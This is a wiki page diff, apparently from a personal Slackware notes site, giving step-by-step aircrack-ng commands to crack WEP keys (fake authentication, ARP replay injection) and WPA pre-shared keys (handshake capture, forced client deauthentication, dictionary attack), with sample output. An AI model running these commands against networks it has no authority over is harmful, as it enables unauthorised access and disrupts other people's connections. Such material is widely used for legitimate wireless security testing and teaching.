Reinstalling Sanity

User Tools

Site Tools

Trace:
slackware:packet_injection

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
slackware:packet_injection [2011/06/21 23:35] slackslackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
Line 44: Line 44:
 make unload make unload
 </code> </code>
 +
 +====== Cracking WEP ======
  
 Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial): Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial):
Line 118: Line 120:
 </code> </code>
  
-4. Terminal 1: use aireplay-ng to do fake authentication with the AP+===== 4. Terminal 1: use aireplay-ng to do fake authentication with the AP =====
  
 In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
Line 126: Line 128:
 To associate with an access point, use fake authentication: To associate with an access point, use fake authentication:
  
 +<code bash>
  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
  
Line 136: Line 139:
 -h 00:0F:B5:88:AC:82 is our card MAC address -h 00:0F:B5:88:AC:82 is our card MAC address
 ath0 is the wireless interface name ath0 is the wireless interface name
 +</code>
  
 Success looks like: Success looks like:
  
 +<code bash>
 18:18:20  Sending Authentication Request 18:18:20  Sending Authentication Request
 18:18:20  Authentication successful 18:18:20  Authentication successful
 18:18:20  Sending Association Request 18:18:20  Sending Association Request
 18:18:20  Association successful :-) 18:18:20  Association successful :-)
 +</code>
  
-5. Start aireplay-ng in ARP request replay mode (terminal 1 again)+===== 5. Start aireplay-ng in ARP request replay mode (terminal 1 again) =====
  
 +<code bash>
  aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0  aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
 +</code>
  
 It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time. It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time.
Line 152: Line 160:
 Here is what the screen looks like when ARP requests are being injected: Here is what the screen looks like when ARP requests are being injected:
  
 +<code bash>
  Saving ARP requests in replay_arp-0321-191525.cap  Saving ARP requests in replay_arp-0321-191525.cap
  You should also start airodump-ng to capture replies.  You should also start airodump-ng to capture replies.
  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
 +</code>
  
 You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second. You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
  
-6. Terminal 3: Run aircrack-ng to obtain the WEP key+===== 6. Terminal 3: Run aircrack-ng to obtain the WEP key =====
  
 The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Line 164: Line 174:
 Start another console session and enter: Start another console session and enter:
  
 +<code bash>
  aircrack-ng -b 00:14:6C:7E:40:80 output*.cap  aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
 +
 Where: Where:
  
 -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
 output*.cap selects all files starting with “output” and ending in ”.cap”. output*.cap selects all files starting with “output” and ending in ”.cap”.
-To also use the FMS/Korek method, start another console session and enter:+</code>
  
-You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.+You will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
  
 Here is what success looks like: Here is what success looks like:
  
 +<code bash>
                                               Aircrack-ng 0.9                                               Aircrack-ng 0.9
    
Line 188: Line 201:
                        KEY FOUND! [ 12:34:56:78:90 ]                         KEY FOUND! [ 12:34:56:78:90 ] 
       Probability: 100%       Probability: 100%
 +</code>
 +
 +====== Cracking WPA ======
 +
 +===== 1. Put the Wireless Interface into Monitor Mode =====
 +
 +<code bash>
 +airmon-ng start wlan0 9
 +</code>
 +
 +Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers).
 +
 +===== 2. Listen for a Handshake =====
 +
 +The handshake is the only interesting and useful part of communication between AP and client.
 +
 +<code bash>
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
 +</code>
 +
 +Where:
 +  * -c 9 is the channel for the wireless network
 +  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
 +  * -w psk is the file name prefix for the file which will contain the IVs.
 +  * mon0 is the interface name.
 +
 +Success looks like this -- notice the "WPA handshake:..." in the top right.
 +
 +<code bash>
 +  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
 +                                                                                                               
 +  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 +                                                                                                               
 +  00:14:6C:7E:40:80   39 100       51      116   14    54  WPA2 CCMP   PSK  teddy                           
 +                                                                                                               
 +  BSSID              STATION            PWR  Lost  Packets  Probes                                             
 +                                                                                                               
 +  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35          116
 +</code>
 +
 +===== 3. (if necessary) Deauthenticate a client to capture a handshake =====
 +
 +You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake.
 +
 +<code bash>
 + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
 +</code>
 +
 +Where:
 +  * -0 means deauthentication
 +  * 1 is the number of deauths to send (you can send multiple if you wish)
 +  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
 +  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
 +  * ath0 is the interface name
 +
 +===== 4. Crack the pre-shared key =====
 +
 +<code bash>
 +aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
 +</code>
 +
 +Where:
 +  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
 +  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
  
slackware/packet_injection.1308699347.txt.gz · Last modified: 2019/11/07 17:58 (external edit)